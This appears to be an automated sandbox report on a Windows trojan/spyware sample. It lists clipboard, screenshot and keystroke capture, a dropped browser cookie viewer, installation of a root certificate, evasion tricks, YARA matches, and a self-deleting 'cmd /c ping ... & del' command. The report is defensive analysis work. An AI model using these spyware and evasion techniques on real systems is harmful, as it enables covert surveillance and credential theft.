Source: aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecv71A3.tmp.1.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040AE4D OpenClipboard, 1_2_0040AE4D
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0042D3A8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 0_2_0042D3A8
Creates a DirectInput object (often for capturing keystrokes)
Source: ThunderFW.exe, 00000002.00000002.231958578.0000000000B5A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0043B0F0 GetKeyState,GetKeyState,GetKeyState, 0_2_0043B0F0

System Summary:

PE file has a writeable .text section
Source: aOn5CfTiwS.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040C516 NtQuerySystemInformation, 1_2_0040C516
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 1_2_0040C6FB
Detected potential crypto function
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_004A0004 0_2_004A0004
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_004443D4 0_2_004443D4
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_00404BE4 1_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095A0C3 2_2_0095A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00956A1E 2_2_00956A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095963B 2_2_0095963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095A7BB 2_2_0095A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_0095B51C 2_2_0095B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00959B7F 2_2_00959B7F
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: String function: 004AA524 appears 37 times
PE file contains strange resources
Source: aOn5CfTiwS.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 1612058829275.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612058829275.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: aOn5CfTiwS.exe Binary or memory string: OriginalFilename vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameFsFilter.sys vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Binary or memory string: OriginalFilename" vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp Binary or memory string: @shell32.dllSHGetSpecialFolderPathWSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Foldersshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileName vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEdgeCookiesView.exe@ vs aOn5CfTiwS.exe
Source: aOn5CfTiwS.exe Binary or memory string: OriginalFilename" vs aOn5CfTiwS.exe
Uses 32bit PE files
Source: aOn5CfTiwS.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000000.00000002.265213011.0000000010249000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.2880000.2.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.2880000.2.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.aOn5CfTiwS.exe.10000000.3.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: classification engine Classification label: mal80.troj.spyw.evad.winEXE@10/16@7/2
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: CreateServiceA,GetLastError, 0_2_004072E8
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 1_2_0040CE93
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00951058 CoCreateInstance, 2_2_00951058
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource, 1_2_0040D9FC
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_01
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_install_r3
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\xldl.dat Jump to behavior
Source: aOn5CfTiwS.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1612058829275.exe System information queried: HandleInformation Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: aOn5CfTiwS.exe, 00000000.00000002.261758124.0000000002880000.00000040.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: aOn5CfTiwS.exe Virustotal: Detection: 43%
Source: aOn5CfTiwS.exe Metadefender: Detection: 24%
Source: aOn5CfTiwS.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File read: C:\Users\user\Desktop\aOn5CfTiwS.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\aOn5CfTiwS.exe 'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\1612058829275.exe 'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Process created: C:\Users\user\AppData\Roaming\1612058829275.exe 'C:\Users\user\AppData\Roaming\1612058829275.exe' /sjson 'C:\Users\user\AppData\Roaming\1612058829275.txt' Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' Jump to behavior
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\aOn5CfTiwS.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E2B3C97F-6AE1-41AC-817A-F6F92166D7DD}\InprocServer32 Jump to behavior
Source: aOn5CfTiwS.exe Static file information: File size 5007872 > 1048576
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to behavior
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.0.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe, 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp, 1612058829275.exe.0.dr
Source: Binary string: atl71.pdbT source: atl71.dll.0.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.0.dr
Source: Binary string: atl71.pdb source: atl71.dll.0.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.0.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.0.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.0.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.0.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.0.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.0.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000002.00000000.231496774.000000000095C000.00000002.00020000.sdmp, ThunderFW.exe.0.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.0.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.0.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Unpacked PE file: 0.2.aOn5CfTiwS.exe.2880000.2.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040D071 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0040D071
PE file contains an invalid checksum
Source: aOn5CfTiwS.exe Static PE information: real checksum: 0xeea28 should be: 0x4c8d48
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0040D0E4 push 0040D110h; ret 0_2_0040D108
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_004421C4 push 0044221Eh; ret 0_2_00442216
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0044526C push 00445298h; ret 0_2_00445290
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040E2F1 push ecx; ret 1_2_0040E301
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040E340 push eax; ret 1_2_0040E354
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040E340 push eax; ret 1_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 2_2_00953FB5 push ecx; ret 2_2_00953FC8

Persistence and Installation Behavior:

Installs new ROOT certificates
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Roaming\1612058829275.exe Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe File created: C:\Users\user\AppData\Local\Temp\xldl.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0043A078 IsIconic,BeginPaint,DrawIcon,EndPaint, 0_2_0043A078
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_00441118 SendMessageA,SetClassLongA,IsIconic,InvalidateRect, 0_2_00441118
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0043A1C4 IsIconic, 0_2_0043A1C4
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0043B1BC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow, 0_2_0043B1BC
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: 0_2_0043F2BC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 0_2_0043F2BC
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Code function: 1_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0040C41D
Source: C:\Users\user\AppData\Roaming\1612058829275.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 0_2_0043E268
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll Jump to dropped file
Source: C:\Users\user\Desktop\aOn5CfTiwS.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll Jump to dropped file
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp Binary or memory string: vmware
Source: aOn5CfTiwS.exe, 00000000.00000003.213585435.00000000022BB000.00000004.00000001.sdmp Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: aOn5CfTiwS.exe, 00000000.00000003.213567908.00000000022B2000.00000004.00000001.sdmp Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display 